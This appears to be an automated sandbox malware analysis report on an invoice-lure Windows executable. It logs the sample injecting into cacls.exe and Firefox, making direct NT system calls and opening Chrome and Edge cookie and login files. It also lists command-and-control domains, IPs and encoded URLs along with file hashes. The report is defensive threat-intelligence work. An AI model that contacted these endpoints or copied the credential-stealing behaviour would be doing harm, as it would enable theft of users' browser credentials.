Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtTerminateThread: Direct from: 0x77377B2E	Jump to behavior

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: NULL target: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cacls.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: NULL target: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: NULL target: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: fXZvHKoWCzop.exe, 0000000B.00000000.2950711553.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000B.00000002.4649775732.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000E.00000000.3123706382.0000000000E81000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: fXZvHKoWCzop.exe, 0000000B.00000000.2950711553.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000B.00000002.4649775732.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000E.00000000.3123706382.0000000000E81000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: fXZvHKoWCzop.exe, 0000000B.00000000.2950711553.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000B.00000002.4649775732.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000E.00000000.3123706382.0000000000E81000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: fXZvHKoWCzop.exe, 0000000B.00000000.2950711553.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000B.00000002.4649775732.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000E.00000000.3123706382.0000000000E81000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Queries volume information: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
213.249.67.10	www.tanjavanlaar.online	Netherlands	42585	METAREGISTRARNL	true
168.206.11.225	www.iwhfa.fyi	South Africa	137951	CLAYERLIMITED-AS-APClayerLimitedHK	true
217.160.0.158	accupower.tech	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
162.0.229.222	nieuws-july202502.sbs	Canada	22612	NAMECHEAP-NETUS	true
92.118.228.160	www.kuaimaolife.shop	Latvia	35913	DEDIPATH-LLCUS	true
209.74.64.190	www.hellogus.online	United States	31744	MULTIBAND-NEWHOPEUS	true
3.33.130.190	funddata-x.net	United States	8987	AMAZONEXPANSIONGB	true

Windows Analysis Report FACTURA 24V70 VINS.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
FACTURA 24V70 VINS.exe

Malware Threat Intel
Provided by

Name	Malicious	Antivirus Detection	Reputation
http://www.hellogus.online/zrnp/?0dfXG=7dvP3oKbkgtActo7X+aB5i8XRavAV5IyhK19vEIy5gkELgbrMMXbl9nvhn4QjRtqjZGCw7A4nUi7FbRpiGaR0ExHc3mJnAhEafCzKEQKll8qfESIyEeBcE8V5iUbRPjYsxxHG3c=&U0W=7ROlj	true	Avira URL Cloud: safe	unknown
http://www.wiretap.digital/lbm4/	true	Avira URL Cloud: safe	unknown
http://www.funddata-x.net/ktuy/?U0W=7ROlj&0dfXG=652DQ4wRyI2XhVz/YhB0IQPCvW3zE+wrC97TZKhiuJWrpaOjtOEU/fEJ0zut8nj2vm3uuaJhtQEDGSF/YMgRQz9E7T0dRnILtzW899MV4oEvPyMvvne8hVkOXAeZd0jlejfVwHA=	true	Avira URL Cloud: safe	unknown
http://www.tanjavanlaar.online/x6qo/	true	Avira URL Cloud: safe	unknown
http://www.tanjavanlaar.online/x6qo/?0dfXG=LYoYqqsXSyXZ912d02KeRxWxUajovPP+KCE++TS9h3rijU4gS1lBkAl2SxoHngebSXZzdlj5br48AWpKGxuZwHFzrTAaxdvQ/X7He5kEj4NwOXn+jWKWbQEmUjM4tYdd4DTDmwg=&U0W=7ROlj	true	Avira URL Cloud: safe	unknown
http://www.nieuws-july202502.sbs/vt2q/?0dfXG=NeoW3ZpGNhFVpRE+iGe18olEV8dN0FIDCvpVAutU77D6mk6iXiXc50i5bVx+uujx/SS4gHQAhcY6fImMEntZJ64couIpYsJtCpfvEgcpegPN4ht4aXCPY1AcPZvlMYHCMmAE9mg=&U0W=7ROlj	true	Avira URL Cloud: safe	unknown
http://www.impulsarnegocios.info/bpal/?0dfXG=VMgVOaCh3mm+GdPlwv+P/XKcyqoSqp/AEn6p1isqCLPz7ObQC9Sqz3hudnfRRQZjENudSaBoMynPI/uiESQeR0wcE+BMO0b1K91MeQYvtVLH9vcXww6dd1bPq3nzmSOiSfDHfUE=&U0W=7ROlj	true	Avira URL Cloud: safe	unknown
http://www.hellogus.online/zrnp/	true	Avira URL Cloud: safe	unknown
http://www.kuaimaolife.shop/wlzg/?0dfXG=c08zQlMNeTS9mFjcPTIyFfA1amU1nGqngy7ufrhJTucKXTiOjnqlR7bZNhOZWme4Y5s9JAieBcHnX0Bnfm5WdfKnufcgj0lRy4Tut92jAo5YyVSLqem1aQwSKpkntqqW/GXfj2I=&U0W=7ROlj	true	Avira URL Cloud: safe	unknown
http://www.impulsarnegocios.info/bpal/	true	Avira URL Cloud: safe	unknown
http://www.accupower.tech/bruv/	true	Avira URL Cloud: malware	unknown
http://www.kuaimaolife.shop/wlzg/	true	Avira URL Cloud: safe	unknown
http://www.accupower.tech/bruv/?0dfXG=m8AssDc9uWk0x9GHCTrZnR9Y2jIcSn1GjYx2w9avnpMe4W6VVreO1nGOBjertTgGFNtTfqQ2X/AnqGB7Ol5o31E7begEaRgXS9U7KwBR2U2mwEb1+OLmP0VxkBeeDW6FuSeEkXI=&U0W=7ROlj	true	Avira URL Cloud: malware	unknown
http://www.funddata-x.net/ktuy/	true	Avira URL Cloud: safe	unknown
http://www.nieuws-july202502.sbs/vt2q/	true	Avira URL Cloud: safe	unknown
http://www.wiretap.digital/lbm4/?0dfXG=b6KmuAKoHDfmH6wBa4Iuhs+4qAfci8KJxStQSrt0xRWxrI04LbR2sZmSZHliQZPsTEeCyhZmzit1d7xvCBPKA7cM2dH3/rnJzTWpKXRa2CCyGb+HtjdcybjYJ406KzLAcPDnEDo=&U0W=7ROlj	true	Avira URL Cloud: safe	unknown

ID:	1562313
Product:	CloudBasic
Start time:	13:53:19
Start date:	25.11.2024
Sample:	FACTURA 24V70 VINS.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	6e3917643d8c875e3f45c265b82cca9d
SHA1:	09163656f409eade7b892bd1e7ec8f9cdf045715
SHA256:	ddca7740e832942313e7bd03a5670bc03cb09d8113433826e252666eeda046ab
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FACTURA 24V70 VINS.exe.log	ASCII text, with CRLF line terminators	1330C80CAAC9A0FB172F202485E9B1E8	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
C:\Users\user\AppData\Local\Temp\n-T73hKo	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8	271D5F995996735B01672CF227C81C17	7AEAACD66A59314D1CBF4016038D3A0A956BAF33	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4